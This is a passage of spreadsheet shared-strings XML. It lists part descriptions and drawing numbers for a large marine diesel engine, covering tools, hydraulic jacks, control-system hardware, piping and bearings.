  <si>
    <t>4270-0210 Fuel Valve Nozz</t>
  </si>
  <si>
    <t>4270-0210-0002.0</t>
  </si>
  <si>
    <t>FUEL VALVE TEST RIG</t>
  </si>
  <si>
    <t>5112863-2.0</t>
  </si>
  <si>
    <t>4270-0220 FUEL VALVE TEST</t>
  </si>
  <si>
    <t>4270-0220-0001.0</t>
  </si>
  <si>
    <t>COVER, CIRCULAR</t>
  </si>
  <si>
    <t>5060022-8.2</t>
  </si>
  <si>
    <t>HOSE,SMOOTH</t>
  </si>
  <si>
    <t>1740564-9.1</t>
  </si>
  <si>
    <t>TURBOCHARGER SYSTEM, TOOLS</t>
  </si>
  <si>
    <t>5341404-6.3</t>
  </si>
  <si>
    <t>TS LIFTING ATTACHM, AIR C</t>
  </si>
  <si>
    <t>5197731-6.1</t>
  </si>
  <si>
    <t>5470-0700-0001.0</t>
  </si>
  <si>
    <t>GENERAL, TOOLS</t>
  </si>
  <si>
    <t>0955979-6.2</t>
  </si>
  <si>
    <t>EXTENSION F. DIAL GAUGE</t>
  </si>
  <si>
    <t>PIVOT F. DIAL GAUGE</t>
  </si>
  <si>
    <t>7670-0230-0001.0</t>
  </si>
  <si>
    <t>COMB. SPANNER</t>
  </si>
  <si>
    <t>7670-0250-0001.0</t>
  </si>
  <si>
    <t>TOOL SETS, COMPLETE</t>
  </si>
  <si>
    <t>BOX AND KEY SET, COMPLETE</t>
  </si>
  <si>
    <t>EN549G1</t>
  </si>
  <si>
    <t>SOCKET SPANNERS, SQ.DRIVE</t>
  </si>
  <si>
    <t>EN506L46</t>
  </si>
  <si>
    <t>KEY, HEX. SOCKET SCREWS</t>
  </si>
  <si>
    <t>EN549A22</t>
  </si>
  <si>
    <t>EN548B</t>
  </si>
  <si>
    <t>7670-0210 Open-Ended Span</t>
  </si>
  <si>
    <t>7670-0210-0007.0</t>
  </si>
  <si>
    <t>SINGLE SPANNER</t>
  </si>
  <si>
    <t>EN551F65</t>
  </si>
  <si>
    <t>7670-0240 RING SLUGGING S</t>
  </si>
  <si>
    <t>7670-0240-0011.0</t>
  </si>
  <si>
    <t>RNG.IMP.SPAN.</t>
  </si>
  <si>
    <t>EN554L30</t>
  </si>
  <si>
    <t>OPEN ENDED IMPACT WRENCH</t>
  </si>
  <si>
    <t>0937924-7.3</t>
  </si>
  <si>
    <t>SLUGGING SPANNERS, OPEN</t>
  </si>
  <si>
    <t>EN553E46</t>
  </si>
  <si>
    <t>7670-0260-0001.0</t>
  </si>
  <si>
    <t>PLIERS F. RETAINING RINGS</t>
  </si>
  <si>
    <t>EN519AA0045000</t>
  </si>
  <si>
    <t>5224966-9.0</t>
  </si>
  <si>
    <t>MAIN BEARING, HYDR. JACKS</t>
  </si>
  <si>
    <t>5173179-8.5</t>
  </si>
  <si>
    <t>2570-0400 Main Bearing Hy</t>
  </si>
  <si>
    <t>2570-0400-0013.0</t>
  </si>
  <si>
    <t>SEALING- AND BACK-UP RING</t>
  </si>
  <si>
    <t>EN517EB00990100</t>
  </si>
  <si>
    <t>STAY BOLTS, HYDR. JACKS</t>
  </si>
  <si>
    <t>5092557-3.3</t>
  </si>
  <si>
    <t>Hydraulic Tools for Large</t>
  </si>
  <si>
    <t>P91261-0102.0</t>
  </si>
  <si>
    <t>HYDRAULIC JACK, COMPLETE</t>
  </si>
  <si>
    <t>5092102-0.2</t>
  </si>
  <si>
    <t>HYDRAULIC JACK, PISTON</t>
  </si>
  <si>
    <t>5092101-9.2</t>
  </si>
  <si>
    <t>SUPPORT FOR HYDRAULIC JAC</t>
  </si>
  <si>
    <t>5280504-9.0</t>
  </si>
  <si>
    <t>Drawing</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>METAL CHANNELS, WITH HOLE</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">EXHAUST RECEIVER </t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>DOWEL PIN, PLAIN</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5205000-8.3</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>TS CROSSBAR FOR CYLINDERL</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>4570-0540 EQUIP.TEST ACCU</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆形螺母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                              </t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器体研磨具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                           </t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>0582762-2.1</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>HEXALOBULAR EXTERNAL KEY</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>ROUNDSLING</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>CHAFING DEVICE FOR ROUNDS</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER CRANKCASE</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION COVER, REMOVAB</t>
  </si>
  <si>
    <t>5361794-7.0</t>
  </si>
  <si>
    <t>ANGLE VALVE, PN16</t>
  </si>
  <si>
    <t>EN187B0020.0</t>
  </si>
  <si>
    <t>5574281-0.0</t>
  </si>
  <si>
    <t>SEALING RING, W. O-RING</t>
  </si>
  <si>
    <t>ORIFICE PLUG, OUTSIDE THR</t>
  </si>
  <si>
    <t>5503952-1.0</t>
  </si>
  <si>
    <t>2272-0240-0007.0</t>
  </si>
  <si>
    <t>2272-0230 EXH. VALVE UPPE</t>
  </si>
  <si>
    <t>HYDRAULIC ACCUMULATOR BLOCK</t>
  </si>
  <si>
    <t>INCOMPLETE_21-3026</t>
  </si>
  <si>
    <t>5343371-9.0</t>
  </si>
  <si>
    <t>ME-SOFTWARE &amp; PARAMETERS</t>
  </si>
  <si>
    <t>ECS LANGUAGE</t>
  </si>
  <si>
    <t>5636492-7</t>
  </si>
  <si>
    <t>ECS, ENGLISH-CHINESE</t>
  </si>
  <si>
    <t>5612223-8.0</t>
  </si>
  <si>
    <t>4772-1800 PNEUMATIC COMPO</t>
  </si>
  <si>
    <t>4772-1800-0010.0</t>
  </si>
  <si>
    <t>4772-1600 LOCAL CONTROL B</t>
  </si>
  <si>
    <t>4772-1600-0003.0</t>
  </si>
  <si>
    <t>FPP</t>
  </si>
  <si>
    <t>5461299-1.2</t>
  </si>
  <si>
    <t>TRANSPARENT POLYESTER FIL</t>
  </si>
  <si>
    <t>2031193-8.0</t>
  </si>
  <si>
    <t>INSTRUCTION, SIGN</t>
  </si>
  <si>
    <t>5339317-5.3</t>
  </si>
  <si>
    <t>SPADE CABLE LUG 1,5 6,3 I</t>
  </si>
  <si>
    <t>705583-3.0</t>
  </si>
  <si>
    <t>SPADE CABLE LUGS</t>
  </si>
  <si>
    <t>705580-9.B</t>
  </si>
  <si>
    <t>TERMINAL MARKING</t>
  </si>
  <si>
    <t>5558706-7.1</t>
  </si>
  <si>
    <t>SILICONE GREASE SC-4</t>
  </si>
  <si>
    <t>626058-2.0</t>
  </si>
  <si>
    <t>4772-1550 ENGINE C.S. COM</t>
  </si>
  <si>
    <t>4772-1550-0014.0</t>
  </si>
  <si>
    <t>SCREW, HEXALOBULAR DRIVE</t>
  </si>
  <si>
    <t>1881027-3.0</t>
  </si>
  <si>
    <t>FUSE,CARTRIDGE</t>
  </si>
  <si>
    <t>1880477-2.1</t>
  </si>
  <si>
    <t>INSULATION RESISTANCE MON</t>
  </si>
  <si>
    <t>1882437-6.5</t>
  </si>
  <si>
    <t>POWER SUPPLY, MONITORING</t>
  </si>
  <si>
    <t>1883109-9.2</t>
  </si>
  <si>
    <t>FERRULES</t>
  </si>
  <si>
    <t>5505393-5.2</t>
  </si>
  <si>
    <t>HEXAL.SOCKET PAN HEAD SCR</t>
  </si>
  <si>
    <t>EN59E04008.0</t>
  </si>
  <si>
    <t>PC HARDWARE</t>
  </si>
  <si>
    <t>5322976-9.2</t>
  </si>
  <si>
    <t>MAIN OPERATION PANEL</t>
  </si>
  <si>
    <t>5325580-6.2</t>
  </si>
  <si>
    <t>SOFTWARE LICENCE, STD.CON</t>
  </si>
  <si>
    <t>3090916-5.2</t>
  </si>
  <si>
    <t>MOUNTING PART</t>
  </si>
  <si>
    <t>1882424-4.4</t>
  </si>
  <si>
    <t>GASKET FOR INSTRUMENT</t>
  </si>
  <si>
    <t>1882444-7.0</t>
  </si>
  <si>
    <t>SCREW, CROSS RECESSED DRI</t>
  </si>
  <si>
    <t>1882282-8.0</t>
  </si>
  <si>
    <t>HEAT SINK</t>
  </si>
  <si>
    <t>1882416-1.1</t>
  </si>
  <si>
    <t>USB-KEY HOLDER</t>
  </si>
  <si>
    <t>1882753-8.2</t>
  </si>
  <si>
    <t>1882756-3.3</t>
  </si>
  <si>
    <t>USB MEMORY STICK</t>
  </si>
  <si>
    <t>LICENSE MARKING</t>
  </si>
  <si>
    <t>1881135-1.1</t>
  </si>
  <si>
    <t>INTERFACE ADAPTER</t>
  </si>
  <si>
    <t>1882659-3.0</t>
  </si>
  <si>
    <t>LCD MONITOR</t>
  </si>
  <si>
    <t>1882131-9.2</t>
  </si>
  <si>
    <t>CPU UNITS</t>
  </si>
  <si>
    <t>1882239-9.7</t>
  </si>
  <si>
    <t>1882267-4.1</t>
  </si>
  <si>
    <t>WIRE, WATCH DOG-KIT</t>
  </si>
  <si>
    <t>KEYBOARD WITH POINTER DEV</t>
  </si>
  <si>
    <t>1882249-5.3</t>
  </si>
  <si>
    <t>POINTER DEVICE</t>
  </si>
  <si>
    <t>1882250-5.1</t>
  </si>
  <si>
    <t>TRACKBALL MOUSE</t>
  </si>
  <si>
    <t>1142881-5.8</t>
  </si>
  <si>
    <t>ROUTER</t>
  </si>
  <si>
    <t>1882347-7.1</t>
  </si>
  <si>
    <t>COCOS-EDS</t>
  </si>
  <si>
    <t>5325781-9.1</t>
  </si>
  <si>
    <t>BATTERY</t>
  </si>
  <si>
    <t>5316107-7.1</t>
  </si>
  <si>
    <t>FAN</t>
  </si>
  <si>
    <t>5343635-7.1</t>
  </si>
  <si>
    <t>FAN ACCESSORIES</t>
  </si>
  <si>
    <t>5343651-2.1</t>
  </si>
  <si>
    <t>REDUNDANCY MODULE</t>
  </si>
  <si>
    <t>5330051-2.0</t>
  </si>
  <si>
    <t>CABINET ACCESSORIES</t>
  </si>
  <si>
    <t>5324567-1.2</t>
  </si>
  <si>
    <t>4772-1500 ENGINE CONTROL</t>
  </si>
  <si>
    <t>4772-1500-0015.0</t>
  </si>
  <si>
    <t>CABINET ASSEMBLY</t>
  </si>
  <si>
    <t>5248444-0.1</t>
  </si>
  <si>
    <t>ROUND STEEL BARS, STAINLE</t>
  </si>
  <si>
    <t>EN43RD00160131.0</t>
  </si>
  <si>
    <t>5266081-7.1</t>
  </si>
  <si>
    <t>PACKING, RECTANGULAR</t>
  </si>
  <si>
    <t>5368659-7.3</t>
  </si>
  <si>
    <t>PMI AUTO-TUNING</t>
  </si>
  <si>
    <t>DATA ACQUISITION UNIT</t>
  </si>
  <si>
    <t>1882475-8.8</t>
  </si>
  <si>
    <t>1882003-8.3</t>
  </si>
  <si>
    <t>PACKING MATERIAL, PLATE</t>
  </si>
  <si>
    <t>INCOMPLETE_PART.0</t>
  </si>
  <si>
    <t>Resistor, Metalfilm</t>
  </si>
  <si>
    <t>Diode, Schottky</t>
  </si>
  <si>
    <t>3802070-1.2</t>
  </si>
  <si>
    <t>Capacitor, Ceramic</t>
  </si>
  <si>
    <t>3802101-4.0</t>
  </si>
  <si>
    <t>Resistor, Thick Film</t>
  </si>
  <si>
    <t>3802253-5.1</t>
  </si>
  <si>
    <t>PCB Technicality</t>
  </si>
  <si>
    <t>3803589-6.0</t>
  </si>
  <si>
    <t>Capacitor, Tantal Electro</t>
  </si>
  <si>
    <t>3803693-7.1</t>
  </si>
  <si>
    <t>3803788-5.0</t>
  </si>
  <si>
    <t>Analog Switch</t>
  </si>
  <si>
    <t>3803846-1.0</t>
  </si>
  <si>
    <t>Transistor, MOSFET</t>
  </si>
  <si>
    <t>Digital - Microcontroller</t>
  </si>
  <si>
    <t>3803858-1.0</t>
  </si>
  <si>
    <t>LED</t>
  </si>
  <si>
    <t>3803859-3.0</t>
  </si>
  <si>
    <t>Crystal</t>
  </si>
  <si>
    <t>3803893-8.0</t>
  </si>
  <si>
    <t>3803896-3.1</t>
  </si>
  <si>
    <t>Switch, Other</t>
  </si>
  <si>
    <t>3805450-4.1</t>
  </si>
  <si>
    <t>Bill Of Materials</t>
  </si>
  <si>
    <t>1882247-1.3.1</t>
  </si>
  <si>
    <t>0900 PCBA</t>
  </si>
  <si>
    <t>0900 PCB Layout</t>
  </si>
  <si>
    <t>3805434-9.0</t>
  </si>
  <si>
    <t>3802570-9.0</t>
  </si>
  <si>
    <t>ENGINE, DATA</t>
  </si>
  <si>
    <t>BASIC SYMBOLS-PIPE PLANTS</t>
  </si>
  <si>
    <t>EN603A.0</t>
  </si>
  <si>
    <t>ENGINE, INTERFACE UNIT AR</t>
  </si>
  <si>
    <t>5249238-5.0</t>
  </si>
  <si>
    <t>ENGINE, HYDRAULIC PUMP ST</t>
  </si>
  <si>
    <t>5290694-5.0</t>
  </si>
  <si>
    <t>START UP PUMP</t>
  </si>
  <si>
    <t>5213117-7.1</t>
  </si>
  <si>
    <t>ENGINE, HYDRAULIC FILTER</t>
  </si>
  <si>
    <t>5291205-2.0</t>
  </si>
  <si>
    <t>5291208-8.0</t>
  </si>
  <si>
    <t>CROSS GIRDER CYL. UNIT, W</t>
  </si>
  <si>
    <t>CR. GIRDER, THRUST BEARIN</t>
  </si>
  <si>
    <t>5279295-9.5</t>
  </si>
  <si>
    <t>5279296-0.2</t>
  </si>
  <si>
    <t>CROSS GIRDER JOURNAL, WEL</t>
  </si>
  <si>
    <t>5283251-2.0</t>
  </si>
  <si>
    <t>TOP CLEARANCE MAIN BEARIN</t>
  </si>
  <si>
    <t>2572-0400-0004.0</t>
  </si>
  <si>
    <t>AVD</t>
  </si>
  <si>
    <t>OIL SEAL, AXIAL VIBRATION</t>
  </si>
  <si>
    <t>5682174-1.0</t>
  </si>
  <si>
    <t>DRAIN PIPE, PISTON COOLIN</t>
  </si>
  <si>
    <t>5318321-9.0</t>
  </si>
  <si>
    <t>THRUST BEARING, SEGMENTS</t>
  </si>
  <si>
    <t>5180243-3.4</t>
  </si>
  <si>
    <t>2572-0600 Thrust Bearings</t>
  </si>
  <si>
    <t>2572-0600-0003.0</t>
  </si>
  <si>
    <t>THRUST BEARING, MISC. PAR</t>
  </si>
  <si>
    <t>5278094-1.3</t>
  </si>
  <si>
    <t>P90505-0191.0</t>
  </si>
  <si>
    <t>SCRAPER RING HOUSING, LOW</t>
  </si>
  <si>
    <t>SPRAY NOZZLE, EXT.THREAD</t>
  </si>
  <si>
    <t>1239139-0.1</t>
  </si>
  <si>
    <t>EXHAUST VALVE, MISC. PART</t>
  </si>
  <si>
    <t>5686335-7.0</t>
  </si>
  <si>
    <t>HYDRAULIC STARTING PUMPS</t>
  </si>
  <si>
    <t>5220378-8.2</t>
  </si>
  <si>
    <t>Hydraulic Supply Componen</t>
  </si>
  <si>
    <t>P90640-0004.0</t>
  </si>
  <si>
    <t>4572-1100 Hydraulic Pump</t>
  </si>
  <si>
    <t>4572-1100-0001.0</t>
  </si>
  <si>
    <t>ELECTRICAL MOTOR W. FLANG</t>
  </si>
  <si>
    <t>5140628-7.2</t>
  </si>
  <si>
    <t>GEARBOX</t>
  </si>
  <si>
    <t>5174519-6.5</t>
  </si>
  <si>
    <t>QS FRICTION SHAFT TEST</t>
  </si>
  <si>
    <t>0743221-3.1</t>
  </si>
  <si>
    <t>HIGH PRESSURE PUMP</t>
  </si>
  <si>
    <t>5587749-4.4</t>
  </si>
  <si>
    <t>4572-1000 HYDR POWER SUPP</t>
  </si>
  <si>
    <t>4572-1000-0016.0</t>
  </si>
  <si>
    <t>PR ME TEMPORARY FILTER</t>
  </si>
  <si>
    <t>0743674-2.7</t>
  </si>
  <si>
    <t>4/3-WAY PROPORTIONAL VALV</t>
  </si>
  <si>
    <t>5252908-6.5</t>
  </si>
  <si>
    <t>OIL FILTER ELEMENT</t>
  </si>
  <si>
    <t>5297493-4.1</t>
  </si>
  <si>
    <t>GEAR BOX, PIPES</t>
  </si>
  <si>
    <t>5260229-7.4</t>
  </si>
  <si>
    <t>HYDRAULIC PIPE, COMPLETE</t>
  </si>
  <si>
    <t>5260175-6.3</t>
  </si>
  <si>
    <t>PR MOUNT. HYDRAULIC HOSE</t>
  </si>
  <si>
    <t>0743349-6.2</t>
  </si>
  <si>
    <t>5174857-4.1</t>
  </si>
  <si>
    <t>HYDRAULIC ACC. FIRST TIME</t>
  </si>
  <si>
    <t>ADAPTER, STRAIGHT, MALE/M</t>
  </si>
  <si>
    <t>1748937-3.2</t>
  </si>
  <si>
    <t>TEES, THIN AND THICK WALL</t>
  </si>
  <si>
    <t>EN850FA0034</t>
  </si>
  <si>
    <t>PIPE BENDS, X DEG. W. CER</t>
  </si>
  <si>
    <t>EN850K0034090</t>
  </si>
  <si>
    <t>FLANGE, RECTANGULAR</t>
  </si>
  <si>
    <t>5043831-2.0</t>
  </si>
  <si>
    <t>BUTTERFLY VALVES,FL.HOUS.</t>
  </si>
  <si>
    <t>EN833M0050</t>
  </si>
  <si>
    <t>RUBBER COMPENSATOR, FLUID</t>
  </si>
  <si>
    <t>5093265-4.5</t>
  </si>
  <si>
    <t>5256193-9.0</t>
  </si>
  <si>
    <t>GEAR BOX, SHIELDING</t>
  </si>
  <si>
    <t>INCOMPLETE_21-3026.0</t>
  </si>
  <si>
    <t>ELECTRONICS, WIRING</t>
  </si>
  <si>
    <t>INSTRUMENTATION, ELECTRON</t>
  </si>
  <si>
    <t>5260222-4.0</t>
  </si>
  <si>
    <t>CONTROL PANEL, WIRING</t>
  </si>
  <si>
    <t>5215213-4.3</t>
  </si>
  <si>
    <t>CYLINDER CONTROL, WIRING</t>
  </si>
  <si>
    <t>5209829-9.4</t>
  </si>
  <si>
    <t>HYDRAULIC POWER SUPPLY</t>
  </si>
  <si>
    <t>5655400-9.0</t>
  </si>
  <si>
    <t>POWER SUPPLY, HYDRAULIC</t>
  </si>
  <si>
    <t>5655407-1.0</t>
  </si>
  <si>
    <t>PMI, WIRING</t>
  </si>
  <si>
    <t>5312004-8.0</t>
  </si>
  <si>
    <t>LUBRICATOR, MBD ALPHA CYL</t>
  </si>
  <si>
    <t>5688781-2.0</t>
  </si>
  <si>
    <t>UPPER EXH. SIDE, VARIOUS</t>
  </si>
  <si>
    <t>INCOMPLETE_21-5012.1</t>
  </si>
  <si>
    <t>TURBOCHARGER, VARIOUS PIP</t>
  </si>
  <si>
    <t>INCOMPLETE_21-5014.1</t>
  </si>
  <si>
    <t>MAIN STARTING AIR, VARIOU</t>
  </si>
  <si>
    <t>5279233-7.0</t>
  </si>
  <si>
    <t>STARTING AIR DISTRIBUTOR,</t>
  </si>
  <si>
    <t>5298664-2.0</t>
  </si>
  <si>
    <t>3472-0250 CONTROL AIR SYS</t>
  </si>
  <si>
    <t>3472-0250-0001.0</t>
  </si>
  <si>
    <t>BLOCK CLAMPS, LIGHT DUTY</t>
  </si>
  <si>
    <t>EN227EE40030</t>
  </si>
  <si>
    <t>AIR COOLER, COOLING WATER</t>
  </si>
  <si>
    <t>5272483-8.1</t>
  </si>
  <si>
    <t>AIR COOLER, CLEANING INLE</t>
  </si>
  <si>
    <t>5688406-4.0</t>
  </si>
  <si>
    <t>Fuel oil pipe, Inlet-Outl</t>
  </si>
  <si>
    <t>INCOMPLETE_21-5034.0</t>
  </si>
  <si>
    <t>5193440-6.0</t>
  </si>
  <si>
    <t>Fuel oil pipe, Drain pipe</t>
  </si>
  <si>
    <t>JACKET COOLING WATER, OUT</t>
  </si>
  <si>
    <t>INCOMPLETE_21-5042.0</t>
  </si>
  <si>
    <t>CYLINDER FRAME, VARIOUS P</t>
  </si>
  <si>
    <t>5231015-6.0</t>
  </si>
  <si>
    <t>WELD-ON FLANGES PN 6</t>
  </si>
  <si>
    <t>EN362PB0048</t>
  </si>
  <si>
    <t>EN186G0040</t>
  </si>
  <si>
    <t>HCU, DRAIN PIPE</t>
  </si>
  <si>
    <t>ARR. OF DRAIN PIPE, HCU</t>
  </si>
  <si>
    <t>5240152-0.0</t>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN, HCU</t>
  </si>
  <si>
    <t>5240113-7.0</t>
  </si>
  <si>
    <t>ST.PLATES FOR OXY-CUTTING</t>
  </si>
  <si>
    <t>EN43AB0014</t>
  </si>
  <si>
    <t>5329875-3.0</t>
  </si>
  <si>
    <t>Bedplate, Drain pipe</t>
  </si>
  <si>
    <t>System oil inlet, Lub. oi</t>
  </si>
  <si>
    <t>INCOMPLETE_21-5074.0</t>
  </si>
  <si>
    <t>MAIN BEARING, LUB. OIL PI</t>
  </si>
  <si>
    <t>INCOMPLETE_21-5076.1</t>
  </si>
  <si>
    <t>DAMPER, LUB. OIL PIPE</t>
  </si>
  <si>
    <t>INCOMPLETE_21-5079.0</t>
  </si>
  <si>
    <t>EXHAUST ACTUATOR, LUB. OI</t>
  </si>
  <si>
    <t>INCOMPLETE_21-5080.0</t>
  </si>
  <si>
    <t>5191369-0.0</t>
  </si>
  <si>
    <t>HYDRAULIC OIL FILTER</t>
  </si>
  <si>
    <t>5617211-0.0</t>
  </si>
  <si>
    <t>HYDR. OIL PIPES, INLET -</t>
  </si>
  <si>
    <t>HYDR. OIL, LOW PRESSURE</t>
  </si>
  <si>
    <t>5623135-0.1</t>
  </si>
  <si>
    <t>SYSTEM OIL BACK FLUSHING</t>
  </si>
  <si>
    <t>5623690-7.0</t>
  </si>
  <si>
    <t>CONTROL AND SAFETY AIR, P</t>
  </si>
  <si>
    <t>5353510-3.2</t>
  </si>
  <si>
    <t>PS CABLING &amp; CONNECTIONS</t>
  </si>
  <si>
    <t>0743263-2.1</t>
  </si>
  <si>
    <t>INSTRUMENTATION, ALARM -</t>
  </si>
  <si>
    <t>5675488-1.0</t>
  </si>
  <si>
    <t>PRESSURE GAUGE, DIAL TYPE</t>
  </si>
  <si>
    <t>5662722-1.0</t>
  </si>
  <si>
    <t>STEEL PLATES</t>
  </si>
  <si>
    <t>EN43AH0040</t>
  </si>
  <si>
    <t>THERMOMETER, DIAL TYPE</t>
  </si>
  <si>
    <t>5095375-5.3</t>
  </si>
  <si>
    <t>TEMP. TRANSMITTER, 4-20MA</t>
  </si>
  <si>
    <t>EN46BG26150</t>
  </si>
  <si>
    <t>CYL. PRESSURE MEASURING E</t>
  </si>
  <si>
    <t>5676007-1.0</t>
  </si>
  <si>
    <t>WATER IN LUB.OIL MONITORI</t>
  </si>
  <si>
    <t>CRANKSHAFT POS. SENSING S</t>
  </si>
  <si>
    <t>INCOMPLETE_21-7438.0</t>
  </si>
  <si>
    <t>FITTED STUD, THREAD BOTH ENDS</t>
  </si>
  <si>
    <t>5683994-2.0</t>
  </si>
  <si>
    <t>CYLINDER LINER, BLANK</t>
  </si>
  <si>
    <t>5685761-6.0</t>
  </si>
  <si>
    <t>COOLING JACKET, PROTECT.</t>
  </si>
  <si>
    <t>5635158-1.2</t>
  </si>
  <si>
    <t>2272-0320 Cyl Cov Protect</t>
  </si>
  <si>
    <t>2272-0320-0009.0</t>
  </si>
  <si>
    <t>PROTECTION SHIELD</t>
  </si>
  <si>
    <t>5635163-9.0</t>
  </si>
  <si>
    <t>STUDS, STARTING VALVE ASS</t>
  </si>
  <si>
    <t>5258168-8.1</t>
  </si>
  <si>
    <t>STUDS, FUEL VALVE ASSY</t>
  </si>
  <si>
    <t>5258191-4.0</t>
  </si>
  <si>
    <t>STEEL PIPES W. CERTIFICAT</t>
  </si>
  <si>
    <t>EN150AJ00773230</t>
  </si>
  <si>
    <t>STARTING VALVE (CYL.COVER</t>
  </si>
  <si>
    <t>5370633-0.1</t>
  </si>
  <si>
    <t>SCAVENGING AIR COOLER FRA</t>
  </si>
  <si>
    <t>5248121-6.4</t>
  </si>
  <si>
    <t>5472-0110 Scav. Air Coole</t>
  </si>
  <si>
    <t>5472-0110-0020.0</t>
  </si>
  <si>
    <t>SCAV. AIR RECIEVER, FLOOR</t>
  </si>
  <si>
    <t>5248120-4.0</t>
  </si>
  <si>
    <t>5251657-5.0</t>
  </si>
  <si>
    <t>FITTED STUD, THREAD BOTH</t>
  </si>
  <si>
    <t>7670-0100-0004.0</t>
  </si>
  <si>
    <t>7670-0220 Open End. Slugg</t>
  </si>
  <si>
    <t>3/2 WAY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR ASSEMBLY OF HCU BLOCK</t>
  </si>
  <si>
    <t>0743264-4.2</t>
  </si>
  <si>
    <t>0743358-0.3</t>
  </si>
  <si>
    <t>BASE PLATE FOR HCU - MACH</t>
  </si>
  <si>
    <t>BASE PLATE FOR HCU - WELD</t>
  </si>
  <si>
    <t>5682011-2.1</t>
  </si>
  <si>
    <t>INSTR. F.THIGHTENING NUTS</t>
  </si>
  <si>
    <t>EN48U.0</t>
  </si>
  <si>
    <t>5206688-0.1</t>
  </si>
  <si>
    <t>FUEL OIL BOOSTER PLUNGER</t>
  </si>
  <si>
    <t>ORIFICE PLUG, EXTERNAL TH</t>
  </si>
  <si>
    <t>5237489-7.0</t>
  </si>
  <si>
    <t>NUT, ROUND W. TOMMY BAR H</t>
  </si>
  <si>
    <t>5557369-4.0</t>
  </si>
  <si>
    <t>CALIBRATION PROCEDURE</t>
  </si>
  <si>
    <t>0743484-8.4</t>
  </si>
  <si>
    <t>QC FIVA VALVE 1.ST APPROV</t>
  </si>
  <si>
    <t>0743529-4.3</t>
  </si>
  <si>
    <t>SCREW, SPECIAL</t>
  </si>
  <si>
    <t>5157024-2.0</t>
  </si>
  <si>
    <t>VIBRATION TEST SPECIFICAT</t>
  </si>
  <si>
    <t>3090801-4.1</t>
  </si>
  <si>
    <t>SCRAPER RING HOUSING, COM</t>
  </si>
  <si>
    <t>SOFTWARE &amp; PARAMETERS</t>
  </si>
  <si>
    <t>MANUAL</t>
  </si>
  <si>
    <t>PACKING POCKET</t>
  </si>
  <si>
    <t>STEEL PIPE, EXT. DIA. 300</t>
  </si>
  <si>
    <t>STEEL PIPE, EXT. DIA. 350</t>
  </si>
  <si>
    <t>PIPE, CONICAL</t>
  </si>
  <si>
    <t>LUB. OIL PIPE-VIBR.DAMPER</t>
  </si>
  <si>
    <t>STEEL PIPE, EXT. DIA. 150</t>
  </si>
  <si>
    <t>CROSSHEAD AND CONN ROD, T</t>
  </si>
  <si>
    <t>5688887-9.0</t>
  </si>
  <si>
    <t>CROSSHEAD, HYDR. JACKS</t>
  </si>
  <si>
    <t>5174058-2.2</t>
  </si>
  <si>
    <t>CONNECTING ROD, HYDR. JAC</t>
  </si>
  <si>
    <t>5093158-8.4</t>
  </si>
  <si>
    <t>STEEL PIPE, EXT. DIA. 200</t>
  </si>
  <si>
    <t>5692332-7.0</t>
  </si>
  <si>
    <t>TS BRACKET, SUPPORT OF CR</t>
  </si>
  <si>
    <t>5197625-1.1</t>
  </si>
  <si>
    <t>TS CHAIN, SUSPENDING PIST</t>
  </si>
  <si>
    <t>5197633-4.1</t>
  </si>
  <si>
    <t>TS LIFT. ATTACHM, CONNECT</t>
  </si>
  <si>
    <t>5197634-6.2</t>
  </si>
  <si>
    <t>TS LIFT. ATTACHM. CRANKPI</t>
  </si>
  <si>
    <t>5197641-7.1</t>
  </si>
  <si>
    <t>TS LIFTING TOOL, CROSSHEA</t>
  </si>
  <si>
    <t>5197644-2.1</t>
  </si>
  <si>
    <t>TS SLING, CR.HEAD BEARING</t>
  </si>
  <si>
    <t>5202655-8.1</t>
  </si>
  <si>
    <t>RETAINING TOOL, TELESCO.</t>
  </si>
  <si>
    <t>5688714-3.0</t>
  </si>
  <si>
    <t>RUBBER COVER F. CROSHEAD</t>
  </si>
  <si>
    <t>1281517-8.1</t>
  </si>
  <si>
    <t>5172393-6.1</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                   </t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>SPACER TUBULAR,SOCKET-END</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>GEN. INSPECT. OF PLATES</t>
  </si>
  <si>
    <t>CUT. PLAN/PL.LIST-FR.BOX</t>
  </si>
  <si>
    <t>5675818-9.0</t>
  </si>
  <si>
    <t>PMI BASIC SOFTWARE</t>
  </si>
